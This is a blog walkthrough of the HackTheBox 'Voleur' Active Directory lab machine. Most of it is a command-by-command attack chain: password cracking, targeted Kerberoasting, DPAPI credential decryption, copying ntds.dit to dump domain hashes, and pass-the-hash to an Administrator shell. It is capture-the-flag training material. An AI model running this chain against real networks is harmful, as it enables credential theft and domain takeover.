HackTheBox Voleur Walkthrough

insidepwninsidepwn
3 min read

This was a medium AD machine with initial credentials ryan.naylor:HollowOct31Nyt and also ntlm was disabled will use kerberos.

Initial Enumeration

The nmap scan show nothing unusual just ssh at port 2222

also with bloodhound nothing much i got with initial user

Foothold and user.txt

First we will explore smb shares using

impacket-getTGT 'VOLEUR.HTB/ryan.naylor':'HollowOct31Nyt'
export KRB5CCNAME=ryan.naylor.ccache
impacket-smbclient -k -no-pass VOLEUR.HTB/ryan.naylor@dc.voleur.htb

the it share has a folder called First-Line Support and a file called Access_Review.xlsx but the file is password protected so using john will crack that

office2john Access_Review.xlsx > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

after cracking the pass and opening the file from it , you will get a some account and password

with the help of this in bloodhound we can see that svc_ldap has writespn rights over svc_winrm

impacket-getTGT 'VOLEUR.HTB/svc_ldap:M1XyC9pW7qT5Vn'
export KRB5CCANME=svc_ldap.ccache
python targetedKerberoast.py -k --dc-host dc.voleur.htb -d VOLEUR.HTB

crack the hash using john the ripper

john svcc_winrm.txt --wordlist=/usr/share/wordlists/rockyou.txt

now we will request tgt for user svc_winrm and access its shell

impacket-getTGT 'VOLEUR.HTB/svc_winrm':'<put_pass_here>'
export KRB5CCNAME=svc_winrm.ccache
evil-winrm -i dc.voleur.htb -r voleur.htb

Privelege Escalation and root.txt

Now in Access_review.xlsx we can see that user todd.wolfe has a been deleted or marked as deleted , so first we will restore that using svc_ldap , why svc_ldap because the account is a member of Restore_Users group

bloodyAD --host dc.voleur.htb -d voleur.htb -u 'svc_ldap' -p 'M1XyC9pW7qT5Vn' -k set restore 'todd.wolfe'

use latest bloodyAD version , else you will get errors .

after restoring it ,we will move towards the smb of todd.wolfe and decrypt the pass of user jeremy.combs

impacket-getTGT 'VOLEUR.HTB/todd.wolfe':'<pass_here_of_todd>
export KRB5CCNAME=todd.wolfe.ccache
impacket-smbclient -k -no-pass VOLEUR.HTB/todd.wolfe@dc.voleur.htb
use IT
cd /Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Credentials/
get 772275FAD58525253490A9B0039791D3
cd /Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Protect/S-1-5-21-3927696377-1337352550-2781715495-1110
get 08949382-134f-4c63-b93c-ce52efc0aa88

then decrypt using

impacket-dpapi masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -password '<pass_of_todd>' -sid S-1-5-21-3927696377-1337352550-2781715495-1110
impacket-dpapi credential -file 772275FAD58525253490A9B0039791D3 -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83

using this you will get pass of jeremy.combs

then we will access the smb shares of jeremy.combs and there we will find a note and id_rsa of ssh , the note said

here the admin is talking about svc_backup so we will access its ssh

ssh -i id_rsa svc_backup@voleur.htb -p 2222

after exploring the ssh and using linpeas i did get something which is ntds.dit which we will use to dump hashes of admin and other users , first we will go to /mnt/c/IT/Third-Line Support/Backups/Active Directory and copy the ntds.dit to tmp and then to /mnt/c/IT/Third-Line Support/Backups/registry and copy the SYSTEM file to /tmp then using scp service we will copy it to our machine

scp -i id_rsa -P 2222 svc_backup@voleur.htb:/tmp/ntds.dit /path/to/save
scp -i id_rsa -P 2222 svc_backup@voleur.htb:/tmp/SYSTEM /path/to/save

then we will use impacket-secretsdump to dump hashes locally

impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL

we will get the ntlm hash of admin , so we will get a tgt for him and access the shell so the root.txt

impacket-getTGT 'VOLEUR.HTB/Administrator' -hashes <LM:NT>
export KRB5CCNAME=Administrator.ccache
evil-winrm -i dc.voleur.htb -r voleur.htb

This is it for this machine .

Thanks for reading the walkthrough. Hope you like it ! Do leave a comment for feedback or queries !!

10
Subscribe to my newsletter

Read articles from insidepwn directly inside your inbox. Subscribe to the newsletter, and don't miss out.

Written by

insidepwn
insidepwn